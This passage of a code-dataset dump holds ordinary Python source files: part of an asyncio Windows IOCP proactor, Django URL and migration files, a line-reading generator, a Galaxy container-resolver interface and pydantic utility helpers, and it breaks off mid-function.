_WindowsSubprocessTransport(self, protocol, args, shell,\r\n stdin, stdout, stderr, bufsize,\r\n waiter=waiter, extra=extra,\r\n **kwargs)\r\n try:\r\n await waiter\r\n except (SystemExit, KeyboardInterrupt):\r\n raise\r\n except BaseException:\r\n transp.close()\r\n await transp._wait()\r\n raise\r\n\r\n return transp\r\n\r\n\r\nclass IocpProactor:\r\n \"\"\"Proactor implementation using IOCP.\"\"\"\r\n\r\n def __init__(self, concurrency=0xffffffff):\r\n self._loop = None\r\n self._results = []\r\n self._iocp = _overlapped.CreateIoCompletionPort(\r\n _overlapped.INVALID_HANDLE_VALUE, NULL, 0, concurrency)\r\n self._cache = {}\r\n self._registered = weakref.WeakSet()\r\n self._unregistered = []\r\n self._stopped_serving = weakref.WeakSet()\r\n\r\n def _check_closed(self):\r\n if self._iocp is None:\r\n raise RuntimeError('IocpProactor is closed')\r\n\r\n def __repr__(self):\r\n info = ['overlapped#=%s' % len(self._cache),\r\n 'result#=%s' % len(self._results)]\r\n if self._iocp is None:\r\n info.append('closed')\r\n return '<%s %s>' % (self.__class__.__name__, \" \".join(info))\r\n\r\n def set_loop(self, loop):\r\n self._loop = loop\r\n\r\n def select(self, timeout=None):\r\n if not self._results:\r\n self._poll(timeout)\r\n tmp = self._results\r\n self._results = []\r\n return tmp\r\n\r\n def _result(self, value):\r\n fut = self._loop.create_future()\r\n fut.set_result(value)\r\n return fut\r\n\r\n def recv(self, conn, nbytes, flags=0):\r\n self._register_with_iocp(conn)\r\n ov = _overlapped.Overlapped(NULL)\r\n try:\r\n if isinstance(conn, socket.socket):\r\n ov.WSARecv(conn.fileno(), nbytes, flags)\r\n else:\r\n ov.ReadFile(conn.fileno(), nbytes)\r\n except BrokenPipeError:\r\n return self._result(b'')\r\n\r\n def finish_recv(trans, key, ov):\r\n try:\r\n return ov.getresult()\r\n except OSError as exc:\r\n if exc.winerror in (_overlapped.ERROR_NETNAME_DELETED,\r\n _overlapped.ERROR_OPERATION_ABORTED):\r\n raise ConnectionResetError(*exc.args)\r\n else:\r\n raise\r\n\r\n return self._register(ov, conn, finish_recv)\r\n\r\n def recv_into(self, conn, buf, flags=0):\r\n self._register_with_iocp(conn)\r\n ov = _overlapped.Overlapped(NULL)\r\n try:\r\n if isinstance(conn, socket.socket):\r\n ov.WSARecvInto(conn.fileno(), buf, flags)\r\n else:\r\n ov.ReadFileInto(conn.fileno(), buf)\r\n except BrokenPipeError:\r\n return self._result(0)\r\n\r\n def finish_recv(trans, key, ov):\r\n try:\r\n return ov.getresult()\r\n except OSError as exc:\r\n if exc.winerror in (_overlapped.ERROR_NETNAME_DELETED,\r\n _overlapped.ERROR_OPERATION_ABORTED):\r\n raise ConnectionResetError(*exc.args)\r\n else:\r\n raise\r\n\r\n return self._register(ov, conn, finish_recv)\r\n\r\n def recvfrom(self, conn, nbytes, flags=0):\r\n self._register_with_iocp(conn)\r\n ov = _overlapped.Overlapped(NULL)\r\n try:\r\n ov.WSARecvFrom(conn.fileno(), nbytes, flags)\r\n except BrokenPipeError:\r\n return self._result((b'', None))\r\n\r\n def finish_recv(trans, key, ov):\r\n try:\r\n return ov.getresult()\r\n except OSError as exc:\r\n if exc.winerror in (_overlapped.ERROR_NETNAME_DELETED,\r\n _overlapped.ERROR_OPERATION_ABORTED):\r\n raise ConnectionResetError(*exc.args)\r\n else:\r\n raise\r\n\r\n return self._register(ov, conn, finish_recv)\r\n\r\n def sendto(self, conn, buf, flags=0, addr=None):\r\n self._register_with_iocp(conn)\r\n ov = _overlapped.Overlapped(NULL)\r\n\r\n ov.WSASendTo(conn.fileno(), buf, flags, addr)\r\n\r\n def finish_send(trans, key, ov):\r\n try:\r\n return ov.getresult()\r\n except OSError as exc:\r\n if exc.winerror in (_overlapped.ERROR_NETNAME_DELETED,\r\n _overlapped.ERROR_OPERATION_ABORTED):\r\n raise ConnectionResetError(*exc.args)\r\n else:\r\n raise\r\n\r\n return self._register(ov, conn, finish_send)\r\n\r\n def send(self, conn, buf, flags=0):\r\n self._register_with_iocp(conn)\r\n ov = _overlapped.Overlapped(NULL)\r\n if isinstance(conn, socket.socket):\r\n ov.WSASend(conn.fileno(), buf, flags)\r\n else:\r\n ov.WriteFile(conn.fileno(), buf)\r\n\r\n def finish_send(trans, key, ov):\r\n try:\r\n return ov.getresult()\r\n except OSError as exc:\r\n if exc.winerror in (_overlapped.ERROR_NETNAME_DELETED,\r\n _overlapped.ERROR_OPERATION_ABORTED):\r\n raise ConnectionResetError(*exc.args)\r\n else:\r\n raise\r\n\r\n return self._register(ov, conn, finish_send)\r\n\r\n def accept(self, listener):\r\n self._register_with_iocp(listener)\r\n conn = self._get_accept_socket(listener.family)\r\n ov = _overlapped.Overlapped(NULL)\r\n ov.AcceptEx(listener.fileno(), conn.fileno())\r\n\r\n def finish_accept(trans, key, ov):\r\n ov.getresult()\r\n # Use SO_UPDATE_ACCEPT_CONTEXT so getsockname() etc work.\r\n buf = struct.pack('@P', listener.fileno())\r\n conn.setsockopt(socket.SOL_SOCKET,\r\n _overlapped.SO_UPDATE_ACCEPT_CONTEXT, buf)\r\n conn.settimeout(listener.gettimeout())\r\n return conn, conn.getpeername()\r\n\r\n async def accept_coro(future, conn):\r\n # Coroutine closing the accept socket if the future is cancelled\r\n try:\r\n await future\r\n except exceptions.CancelledError:\r\n conn.close()\r\n raise\r\n\r\n future = self._register(ov, listener, finish_accept)\r\n coro = accept_coro(future, conn)\r\n tasks.ensure_future(coro, loop=self._loop)\r\n return future\r\n\r\n def connect(self, conn, address):\r\n if conn.type == socket.SOCK_DGRAM:\r\n # WSAConnect will complete immediately for UDP sockets so we don't\r\n # need to register any IOCP operation\r\n _overlapped.WSAConnect(conn.fileno(), address)\r\n fut = self._loop.create_future()\r\n fut.set_result(None)\r\n return fut\r\n\r\n self._register_with_iocp(conn)\r\n # The socket needs to be locally bound before we call ConnectEx().\r\n try:\r\n _overlapped.BindLocal(conn.fileno(), conn.family)\r\n except OSError as e:\r\n if e.winerror != errno.WSAEINVAL:\r\n raise\r\n # Probably already locally bound; check using getsockname().\r\n if conn.getsockname()[1] == 0:\r\n raise\r\n ov = _overlapped.Overlapped(NULL)\r\n ov.ConnectEx(conn.fileno(), address)\r\n\r\n def finish_connect(trans, key, ov):\r\n ov.getresult()\r\n # Use SO_UPDATE_CONNECT_CONTEXT so getsockname() etc work.\r\n conn.setsockopt(socket.SOL_SOCKET,\r\n _overlapped.SO_UPDATE_CONNECT_CONTEXT, 0)\r\n return conn\r\n\r\n return self._register(ov, conn, finish_connect)\r\n\r\n def sendfile(self, sock, file, offset, count):\r\n self._register_with_iocp(sock)\r\n ov = _overlapped.Overlapped(NULL)\r\n offset_low = offset & 0xffff_ffff\r\n offset_high = (offset >> 32) & 0xffff_ffff\r\n ov.TransmitFile(sock.fileno(),\r\n msvcrt.get_osfhandle(file.fileno()),\r\n offset_low, offset_high,\r\n count, 0, 0)\r\n\r\n def finish_sendfile(trans, key, ov):\r\n try:\r\n return ov.getresult()\r\n except OSError as exc:\r\n if exc.winerror in (_overlapped.ERROR_NETNAME_DELETED,\r\n _overlapped.ERROR_OPERATION_ABORTED):\r\n raise ConnectionResetError(*exc.args)\r\n else:\r\n raise\r\n return self._register(ov, sock, finish_sendfile)\r\n\r\n def accept_pipe(self, pipe):\r\n self._register_with_iocp(pipe)\r\n ov = _overlapped.Overlapped(NULL)\r\n connected = ov.ConnectNamedPipe(pipe.fileno())\r\n\r\n if connected:\r\n # ConnectNamePipe() failed with ERROR_PIPE_CONNECTED which means\r\n # that the pipe is connected. There is no need to wait for the\r\n # completion of the connection.\r\n return self._result(pipe)\r\n\r\n def finish_accept_pipe(trans, key, ov):\r\n ov.getresult()\r\n return pipe\r\n\r\n return self._register(ov, pipe, finish_accept_pipe)\r\n\r\n async def connect_pipe(self, address):\r\n delay = CONNECT_PIPE_INIT_DELAY\r\n while True:\r\n # Unfortunately there is no way to do an overlapped connect to\r\n # a pipe. Call CreateFile() in a loop until it doesn't fail with\r\n # ERROR_PIPE_BUSY.\r\n try:\r\n handle = _overlapped.ConnectPipe(address)\r\n break\r\n except OSError as exc:\r\n if exc.winerror != _overlapped.ERROR_PIPE_BUSY:\r\n raise\r\n\r\n # ConnectPipe() failed with ERROR_PIPE_BUSY: retry later\r\n delay = min(delay * 2, CONNECT_PIPE_MAX_DELAY)\r\n await tasks.sleep(delay)\r\n\r\n return windows_utils.PipeHandle(handle)\r\n\r\n def wait_for_handle(self, handle, timeout=None):\r\n \"\"\"Wait for a handle.\r\n\r\n Return a Future object. The result of the future is True if the wait\r\n completed, or False if the wait did not complete (on timeout).\r\n \"\"\"\r\n return self._wait_for_handle(handle, timeout, False)\r\n\r\n def _wait_cancel(self, event, done_callback):\r\n fut = self._wait_for_handle(event, None, True)\r\n # add_done_callback() cannot be used because the wait may only complete\r\n # in IocpProactor.close(), while the event loop is not running.\r\n fut._done_callback = done_callback\r\n return fut\r\n\r\n def _wait_for_handle(self, handle, timeout, _is_cancel):\r\n self._check_closed()\r\n\r\n if timeout is None:\r\n ms = _winapi.INFINITE\r\n else:\r\n # RegisterWaitForSingleObject() has a resolution of 1 millisecond,\r\n # round away from zero to wait *at least* timeout seconds.\r\n ms = math.ceil(timeout * 1e3)\r\n\r\n # We only create ov so we can use ov.address as a key for the cache.\r\n ov = _overlapped.Overlapped(NULL)\r\n wait_handle = _overlapped.RegisterWaitWithQueue(\r\n handle, self._iocp, ov.address, ms)\r\n if _is_cancel:\r\n f = _WaitCancelFuture(ov, handle, wait_handle, loop=self._loop)\r\n else:\r\n f = _WaitHandleFuture(ov, handle, wait_handle, self,\r\n loop=self._loop)\r\n if f._source_traceback:\r\n del f._source_traceback[-1]\r\n\r\n def finish_wait_for_handle(trans, key, ov):\r\n # Note that this second wait means that we should only use\r\n # this with handles types where a successful wait has no\r\n # effect. So events or processes are all right, but locks\r\n # or semaphores are not. Also note if the handle is\r\n # signalled and then quickly reset, then we may return\r\n # False even though we have not timed out.\r\n return f._poll()\r\n\r\n self._cache[ov.address] = (f, ov, 0, finish_wait_for_handle)\r\n return f\r\n\r\n def _register_with_iocp(self, obj):\r\n # To get notifications of finished ops on this objects sent to the\r\n # completion port, were must register the handle.\r\n if obj not in self._registered:\r\n self._registered.add(obj)\r\n _overlapped.CreateIoCompletionPort(obj.fileno(), self._iocp, 0, 0)\r\n # XXX We could also use SetFileCompletionNotificationModes()\r\n # to avoid sending notifications to completion port of ops\r\n # that succeed immediately.\r\n\r\n def _register(self, ov, obj, callback):\r\n self._check_closed()\r\n\r\n # Return a future which will be set with the result of the\r\n # operation when it completes. The future's value is actually\r\n # the value returned by callback().\r\n f = _OverlappedFuture(ov, loop=self._loop)\r\n if f._source_traceback:\r\n del f._source_traceback[-1]\r\n if not ov.pending:\r\n # The operation has completed, so no need to postpone the\r\n # work. We cannot take this short cut if we need the\r\n # NumberOfBytes, CompletionKey values returned by\r\n # PostQueuedCompletionStatus().\r\n try:\r\n value = callback(None, None, ov)\r\n except OSError as e:\r\n f.set_exception(e)\r\n else:\r\n f.set_result(value)\r\n # Even if GetOverlappedResult() was called, we have to wait for the\r\n # notification of the completion in GetQueuedCompletionStatus().\r\n # Register the overlapped operation to keep a reference to the\r\n # OVERLAPPED object, otherwise the memory is freed and Windows may\r\n # read uninitialized memory.\r\n\r\n # Register the overlapped operation for later. Note that\r\n # we only store obj to prevent it from being garbage\r\n # collected too early.\r\n self._cache[ov.address] = (f, ov, obj, callback)\r\n return f\r\n\r\n def _unregister(self, ov):\r\n \"\"\"Unregister an overlapped object.\r\n\r\n Call this method when its future has been cancelled. The event can\r\n already be signalled (pending in the proactor event queue). It is also\r\n safe if the event is never signalled (because it was cancelled).\r\n \"\"\"\r\n self._check_closed()\r\n self._unregistered.append(ov)\r\n\r\n def _get_accept_socket(self, family):\r\n s = socket.socket(family)\r\n s.settimeout(0)\r\n return s\r\n\r\n def _poll(self, timeout=None):\r\n if timeout is None:\r\n ms = INFINITE\r\n elif timeout < 0:\r\n raise ValueError(\"negative timeout\")\r\n else:\r\n # GetQueuedCompletionStatus() has a resolution of 1 millisecond,\r\n # round away from zero to wait *at least* timeout seconds.\r\n ms = math.ceil(timeout * 1e3)\r\n if ms >= INFINITE:\r\n raise ValueError(\"timeout too big\")\r\n\r\n while True:\r\n status = _overlapped.GetQueuedCompletionStatus(self._iocp, ms)\r\n if status is None:\r\n break\r\n ms = 0\r\n\r\n err, transferred, key, address = status\r\n try:\r\n f, ov, obj, callback = self._cache.pop(address)\r\n except KeyError:\r\n if self._loop.get_debug():\r\n self._loop.call_exception_handler({\r\n 'message': ('GetQueuedCompletionStatus() returned an '\r\n 'unexpected event'),\r\n 'status': ('err=%s transferred=%s key=%#x address=%#x'\r\n % (err, transferred, key, address)),\r\n })\r\n\r\n # key is either zero, or it is used to return a pipe\r\n # handle which should be closed to avoid a leak.\r\n if key not in (0, _overlapped.INVALID_HANDLE_VALUE):\r\n _winapi.CloseHandle(key)\r\n continue\r\n\r\n if obj in self._stopped_serving:\r\n f.cancel()\r\n # Don't call the callback if _register() already read the result or\r\n # if the overlapped has been cancelled\r\n elif not f.done():\r\n try:\r\n value = callback(transferred, key, ov)\r\n except OSError as e:\r\n f.set_exception(e)\r\n self._results.append(f)\r\n else:\r\n f.set_result(value)\r\n self._results.append(f)\r\n\r\n # Remove unregistered futures\r\n for ov in self._unregistered:\r\n self._cache.pop(ov.address, None)\r\n self._unregistered.clear()\r\n\r\n def _stop_serving(self, obj):\r\n # obj is a socket or pipe handle. It will be closed in\r\n # BaseProactorEventLoop._stop_serving() which will make any\r\n # pending operations fail quickly.\r\n self._stopped_serving.add(obj)\r\n\r\n def close(self):\r\n if self._iocp is None:\r\n # already closed\r\n return\r\n\r\n # Cancel remaining registered operations.\r\n for address, (fut, ov, obj, callback) in list(self._cache.items()):\r\n if fut.cancelled():\r\n # Nothing to do with cancelled futures\r\n pass\r\n elif isinstance(fut, _WaitCancelFuture):\r\n # _WaitCancelFuture must not be cancelled\r\n pass\r\n else:\r\n try:\r\n fut.cancel()\r\n except OSError as exc:\r\n if self._loop is not None:\r\n context = {\r\n 'message': 'Cancelling a future failed',\r\n 'exception': exc,\r\n 'future': fut,\r\n }\r\n if fut._source_traceback:\r\n context['source_traceback'] = fut._source_traceback\r\n self._loop.call_exception_handler(context)\r\n\r\n # Wait until all cancelled overlapped complete: don't exit with running\r\n # overlapped to prevent a crash. Display progress every second if the\r\n # loop is still running.\r\n msg_update = 1.0\r\n start_time = time.monotonic()\r\n next_msg = start_time + msg_update\r\n while self._cache:\r\n if next_msg <= time.monotonic():\r\n logger.debug('%r is running after closing for %.1f seconds',\r\n self, time.monotonic() - start_time)\r\n next_msg = time.monotonic() + msg_update\r\n\r\n # handle a few events, or timeout\r\n self._poll(msg_update)\r\n\r\n self._results = []\r\n\r\n _winapi.CloseHandle(self._iocp)\r\n self._iocp = None\r\n\r\n def __del__(self):\r\n self.close()\r\n\r\n\r\nclass _WindowsSubprocessTransport(base_subprocess.BaseSubprocessTransport):\r\n\r\n def _start(self, args, shell, stdin, stdout, stderr, bufsize, **kwargs):\r\n self._proc = windows_utils.Popen(\r\n args, shell=shell, stdin=stdin, stdout=stdout, stderr=stderr,\r\n bufsize=bufsize, **kwargs)\r\n\r\n def callback(f):\r\n returncode = self._proc.poll()\r\n self._process_exited(returncode)\r\n\r\n f = self._loop._proactor.wait_for_handle(int(self._proc._handle))\r\n f.add_done_callback(callback)\r\n\r\n\r\nSelectorEventLoop = _WindowsSelectorEventLoop\r\n\r\n\r\nclass WindowsSelectorEventLoopPolicy(events.BaseDefaultEventLoopPolicy):\r\n _loop_factory = SelectorEventLoop\r\n\r\n\r\nclass WindowsProactorEventLoopPolicy(events.BaseDefaultEventLoopPolicy):\r\n _loop_factory = ProactorEventLoop\r\n\r\n\r\nDefaultEventLoopPolicy = WindowsProactorEventLoopPolicy\r\n"} {"ext": "py", "sha": "1a31167fc6d4ad18de810b003a848158d49dfdf9", "content": "from django.urls import path, include\n\nfrom comment.api.views import CommentCreateApiView, CommentListApiView, CommentValidateApiView\n\napp_name = \"comment\"\n\nurlpatterns = [\n path('create/', CommentCreateApiView.as_view(), name='create'),\n path('list/', CommentListApiView.as_view(), name='list'),\n path('validate/<pk>', CommentValidateApiView.as_view(), name='validate'),\n\n \n\n\n]\n"} {"ext": "py", "sha": "1a31173f08fa3cd58402e85b4441216381a3771e", "content": "def readline(f, newline):\n buf = \"\"\n while True:\n while newline in buf:\n pos = buf.index(newline)\n yield buf[:pos]\n buf = buf[pos + len(newline):]\n chunk = f.read(4096 * 10)\n if not chunk:\n yield buf\n break\n buf += chunk\n\n\nwith open(\"index.txt\") as f:\n for line in readline(f, \"{|}\"):\n print(line)\n"} {"ext": "py", "sha": "1a311761b476828346ffb5aebe93651f0964e2fc", "content": "# Generated by Django 3.0 on 2021-01-05 14:01\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Action',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('verb', models.CharField(max_length=255)),\n ('created', models.DateTimeField(auto_now_add=True, db_index=True)),\n ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='actions', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'ordering': ('-created',),\n },\n ),\n ]\n"} {"ext": "py", "sha": "1a3118ff32aac1c9165b9f878ca8b8f876541a2e", "content": "\"\"\"The module defines the abstract interface for resolving container images for tool execution.\"\"\"\nfrom abc import (\n ABCMeta,\n abstractmethod,\n abstractproperty,\n)\n\nfrom galaxy.util.bunch import Bunch\nfrom galaxy.util.dictifiable import Dictifiable\n\n\nclass ResolutionCache(Bunch):\n \"\"\"Simple cache for duplicated computation created once per set of requests (likely web request in Galaxy context).\n\n This should not be assumed to be thread safe - resolution using a given cache should all occur\n one resolution at a time in a single thread.\n \"\"\"\n\n mulled_resolution_cache = None\n\n\nclass ContainerResolver(Dictifiable, metaclass=ABCMeta):\n \"\"\"Description of a technique for resolving container images for tool execution.\"\"\"\n\n # Keys for dictification.\n dict_collection_visible_keys = [\"resolver_type\", \"can_uninstall_dependencies\", \"builds_on_resolution\"]\n can_uninstall_dependencies = False\n builds_on_resolution = False\n read_only = True # not used for containers, but set for when they are used like dependency resolvers\n\n def __init__(self, app_info=None, **kwds):\n \"\"\"Default initializer for ``ContainerResolver`` subclasses.\"\"\"\n self.app_info = app_info\n self.resolver_kwds = kwds\n\n def _get_config_option(self, key, default=None):\n \"\"\"Look in resolver-specific settings for option and then fallback to\n global settings.\n \"\"\"\n if self.app_info and hasattr(self.app_info, key):\n return getattr(self.app_info, key)\n else:\n return default\n\n @abstractmethod\n def resolve(self, enabled_container_types, tool_info, resolution_cache=None, **kwds):\n \"\"\"Find a container matching all supplied requirements for tool.\n\n The supplied argument is a :class:`galaxy.tool_util.deps.containers.ToolInfo` description\n of the tool and its requirements.\n \"\"\"\n\n @abstractproperty\n def resolver_type(self):\n \"\"\"Short label for the type of container resolution.\"\"\"\n\n def _container_type_enabled(self, container_description, enabled_container_types):\n \"\"\"Return a boolean indicating if the specified container type is enabled.\"\"\"\n return container_description.type in enabled_container_types\n\n def __str__(self):\n return f\"{self.__class__.__name__}[]\"\n"} {"ext": "py", "sha": "1a31192a5e77861da5836b222bf9b668132d1eac", "content": "import warnings\nfrom itertools import islice\nfrom types import GeneratorType\nfrom typing import (\n TYPE_CHECKING,\n AbstractSet,\n Any,\n Callable,\n Dict,\n Generator,\n Iterator,\n List,\n Optional,\n Set,\n Tuple,\n Type,\n TypeVar,\n Union,\n no_type_check,\n)\n\nfrom .typing import AnyType, display_as_type\nfrom .version import version_info\n\nif TYPE_CHECKING:\n from inspect import Signature\n from .main import BaseModel, BaseConfig # noqa: F401\n from .typing import AbstractSetIntStr, DictIntStrAny, IntStr, MappingIntStrAny, ReprArgs # noqa: F401\n from .fields import ModelField # noqa: F401\n from .dataclasses import DataclassType # noqa: F401\n\n__all__ = (\n 'import_string',\n 'sequence_like',\n 'validate_field_name',\n 'lenient_issubclass',\n 'in_ipython',\n 'deep_update',\n 'update_not_none',\n 'almost_equal_floats',\n 'get_model',\n 'to_camel',\n 'PyObjectStr',\n 'Representation',\n 'GetterDict',\n 'ValueItems',\n 'version_info', # required here to match behaviour in v1.3\n)\n\n\ndef import_string(dotted_path: str) -> Any:\n \"\"\"\n Stolen approximately from django. Import a dotted module path and return the attribute/class designated by the\n last name in the path. Raise ImportError if the import fails.\n \"\"\"\n from importlib import import_module\n\n try:\n module_path, class_name = dotted_path.strip(' ').rsplit('.', 1)\n except ValueError as e:\n raise ImportError(f'\"{dotted_path}\" doesn\\'t look like a module path') from e\n\n module = import_module(module_path)\n try:\n return getattr(module, class_name)\n except AttributeError as e:\n raise ImportError(f'Module \"{module_path}\" does not define a \"{class_name}\" attribute') from e\n\n\ndef truncate(v: Union[str], *, max_len: int = 80) -> str:\n \"\"\"\n Truncate a value and add a unicode ellipsis (three dots) to the end if it was too long\n \"\"\"\n warnings.warn('`truncate` is no-longer used by pydantic and is deprecated', DeprecationWarning)\n if isinstance(v, str) and len(v) > (max_len - 2):\n # -3 so quote + string + … + quote has correct length\n return (v[: (max_len - 3)] + '…').__repr__()\n try:\n v = v.__repr__()\n except TypeError:\n v = v.__class__.__repr__(v) # in case v is a type\n if len(v) > max_len:\n v = v[: max_len - 1] + '…'\n return v\n\n\ndef sequence_like(v: AnyType) -> bool:\n return isinstance(v, (list, tuple, set, frozenset, GeneratorType))\n\n\ndef validate_field_name(bases: List[Type['BaseModel']], field_name: str) -> None:\n \"\"\"\n Ensure that the field's name does not shadow an existing attribute of the model.\n \"\"\"\n for base in bases:\n if getattr(base, field_name, None):\n raise NameError(\n f'Field name \"{field_name}\" shadows a BaseModel attribute; '\n f'use a different field name with \"alias=\\'{field_name}\\'\".'\n )\n\n\ndef lenient_issubclass(cls: Any, class_or_tuple: Union[AnyType, Tuple[AnyType, ...]]) -> bool:\n return isinstance(cls, type) and issubclass(cls, class_or_tuple)\n\n\ndef in_ipython() -> bool:\n \"\"\"\n Check whether we're in an ipython environment, including jupyter notebooks.\n \"\"\"\n try:\n eval('__IPYTHON__')\n except NameError:\n return False\n else: # pragma: no cover\n return True\n\n\nKeyType = TypeVar('KeyType')\n\n\ndef deep_update(mapping: Dict[KeyType, Any], updating_mapping: Dict[KeyType, Any]) -> Dict[KeyType, Any]:\n updated_mapping = mapping.copy()\n for k, v in updating_mapping.items():\n if k in mapping and isinstance(mapping[k], dict) and isinstance(v, dict):\n updated_mapping[k] = deep_update(mapping[k], v)\n else:\n updated_mapping[k] = v\n return updated_mapping\n\n\ndef update_not_none(mapping: Dict[Any, Any], **update: Any) -> None:\n mapping.update({k: v for k, v in update.items() if v is not None})\n\n\ndef almost_equal_floats(value_1: float, value_2: float, *, delta: float = 1e-8) -> bool:\n \"\"\"\n Return True if two floats are almost equal\n \"\"\"\n return abs(value_1 - value_2) <= delta\n\n\ndef generate_model_signature(\n init: Callable[..., None], fields: Dict[str, 'ModelField'], config: Type['BaseConfig']\n) -> 'Signature':\n \"\"\"\n Generate signature for model based on its fields\n \"\"\"\n from inspect import Parameter, Signature, signature\n\n present_params = signature(init).parameters.values()\n merged_params: Dict[str, Parameter] = {}\n var_kw = None\n use_var_kw = False\n\n for param in islice(present_params, 1, None): # skip self arg\n if param.kind is param.VAR_KEYWORD:\n var_kw = param\n continue\n merged_params[param.name] = param\n\n if var_kw: # if custom init has no var_kw, fields which are not declared in it cannot be passed through\n allow_names = config.allow_population_by_field_name\n for field_name, field in fields.items():\n param_name = field.alias\n if field_name in merged_params or param_name in merged_params:\n continue\n elif not param_name.isidentifier():\n if allow_names and field_name.isidentifier():\n param_name = field_name\n else:\n use_var_kw = True\n continue\n\n # TODO: replace annotation with actual expected types once #1055 solved\n kwargs = {'default': field.default} if not field.required else {}\n merged_params[param_name] = Parameter(\n param_name, Parameter.KEYWORD_ONLY, annotation=field.outer_type_, **kwargs\n )\n\n if config.extra is config.extra.allow:\n use_var_kw = True\n\n if var_kw and use_var_kw:\n # Make sure the parameter for extra kwargs\n # does not have the same name as a field\n default_model_signature = [\n ('__pydantic_self__', Parameter.POSITIONAL_OR_KEYWORD),\n ('data', Parameter.VAR_KEYWORD),\n ]\n if [(p.name, p.kind) for p in present_params] == default_model_signature:\n # if this is the standard model signature, use extra_data as the extra args name\n var_kw_name = 'extra_data'\n else:\n # else start from var_kw\n var_kw_name = var_kw.name\n\n # generate a name that's definitely unique\n while var_kw_name in fields:\n var_kw_name += '_'\n merged_params[var_kw_name] = var_kw.replace(name=var_kw_name)\n\n return Signature(parameters=list(merged_params.values()), return_annotation=None)\n\n\ndef get_model(obj: Union[Type['BaseModel'], Type['DataclassType']]) -> Type['BaseModel']:\n from .main import BaseModel # noqa: F811\n\n try:\n model_cls = obj.__pydantic_model__ # type: ignore\n except AttributeError:\n model_cls = obj\n\n if not issubclass(model_cls, BaseModel):\n raise TypeError('Unsupported type, must be either BaseModel or dataclass')\n return model_cls\n\n\ndef to_camel(string: str) -> str:\n return ''.join(word.capitalize() for word in string.split('_'))\n\n\nclass PyObjectStr(str):\n \"\"\"\n String class where repr doesn't include quotes. Useful with Representation when you want to return a string\n representation of something that valid (or pseudo-valid) python.\n \"\"\"\n\n def __repr__(self) -> str:\n return str(self)\n\n\nclass Representation:\n \"\"\"\n Mixin to provide __str__, __repr__, and __pretty__ methods. See #884 for more details.\n\n __pretty__ is used by [devtools](https://python-devtools.helpmanual.io/) to provide human readable representations\n of objects.\n \"\"\"\n\n __slots__: Tuple[str, ...] = tuple()\n\n def __repr_args__(self) -> 'ReprArgs':\n \"\"\"\n Returns the attributes to show in __str__, __repr__, and __pretty__ this is generally overridden.\n\n Can either return:\n * name - value pairs, e.g.: `[('foo_name', 'foo'), ('bar_name', ['b', 'a', 'r'])]`\n * or, just values, e.g.: `[(None, 'foo'), (None, ['b', 'a', 'r'])]`\n \"\"\"\n attrs = ((s, getattr(self, s)) for s in self.__slots__)\n return [(a, v) for a, v in attrs if v is not None]\n\n def __repr_name__(self) -> str:\n \"\"\"\n Name of the instance's class, used in __repr__.\n \"\"\"\n return self.__class__.__name__\n\n def __repr_str__(self, join_str: str) -> str:\n return join_str.join(repr(v) if a is None else f'{a}={v!r}' for a, v in self.__repr_args__())\n\n def __pretty__(self, fmt: Callable[[Any], Any], **kwargs: Any) -> Generator[Any, None, None]:\n \"\"\"\n Used by devtools (https://python-devtools.helpmanual.io/) to provide a human readable representations of objects\n \"\"\"\n yield self.__repr_name__() + '('\n yield 1\n for name, value in self.__repr_args__():\n if name is not None:\n yield name + '='\n yield fmt(value)\n yield ','\n yield 0\n yield -1\n yield ')'\n\n def __str__(self) -> str:\n return self.__repr_str__(' ')\n\n def __repr__(self) -> str:\n return f'{self.__repr_name__()}({self.__repr_str__(\", \")})'\n\n\nclass GetterDict(Representation):\n \"\"\"\n Hack to make object's smell just enough like dicts for validate_model.\n\n We can't inherit from Mapping[str, Any] because it upsets cython so we have to implement all methods ourselves.\n \"\"\"\n\n __slots__ = ('_obj',)\n\n def __init__(self, obj: Any):\n self._obj = obj\n\n def __getitem__(self, key: str) -> Any:\n try:\n return getattr(self._obj, key)\n except AttributeError as e:\n raise KeyError(key) from e\n\n def get(self, key: Any, default: Any = None) -> Any:\n return getattr(self._obj, key, default)\n\n def extra_keys(self) -> Set[Any]:\n \"\"\"\n We don't want to get any other attributes of obj if the model didn't explicitly ask for them\n \"\"\"\n return set()\n\n def keys(self) -> List[Any]:\n \"\"\"\n Keys of the pseudo dictionary, uses a list not set so order information can be maintained like python\n dictionaries.\n \"\"\"\n return list(self)\n\n def values(self) -> List[Any]:\n return [self[k] for k in self]\n\n def items(self) -> Iterator[Tuple[str, Any]]:\n for k in self:\n yield k, self.get(k)\n\n def __iter__(self) -> Iterator[str]:\n for name in dir(self._obj):\n if not name.startswith('_'):\n yield name\n\n def __len__(self) -> int:\n return sum(1 for _ in self)\n\n def __contains__(self, item: Any) -> bool:\n return item in self.keys()\n\n def __eq__(self, other: Any) -> bool:\n return dict(self) == dict(other.items()) # type: ignore\n\n def __repr_args__(self) -> 'ReprArgs':\n return [(None, dict(self))] # type: ignore\n\n def __repr_name__(self) -> str:\n return f'GetterDict[{display_as_type(self._obj)}]'\n\n\nclass ValueItems(Representation):\n \"\"\"\n Class for more convenient calculation of excluded or included fields on values.\n \"\"\"\n\n __slots__ = ('_items', '_type')\n\n def __init__(self, value: Any, items: Union['AbstractSetIntStr', 'MappingIntStrAny']) -> None:\n if TYPE_CHECKING:\n self._items: Union['AbstractSetIntStr', 'MappingIntStrAny']\n self._type: Type[Union[set, dict]] # type: ignore\n\n # For further type checks speed-up\n if isinstance(items, dict):\n self._type = dict\n elif isinstance(items, AbstractSet):\n self._type = set\n else:\n raise TypeError(f'Unexpected type of exclude value {items.__class__}')\n\n if isinstance(value, (list, tuple)):\n try:\n items = self._normalize_indexes(items, len(value))\n except TypeError as e:\n raise TypeError(\n 'Excluding fields from a sequence of sub-models or dicts must be performed index-wise: '\n 'expected integer keys or keyword \"__all__\"'\n ) from e\n\n self._items = items\n\n @no_type_check\n def is_excluded(self, item: Any) -> bool:\n \"\"\"\n Check if item is fully excluded\n (value considered excluded if self._type is set and item contained in self._items\n or self._type is dict and self._items.get(item) is ...\n\n :param item: key or index of a value\n \"\"\"\n if self._type is set:\n return item in self._items\n return self._items.get(item) is ...\n\n @no_type_check\n def 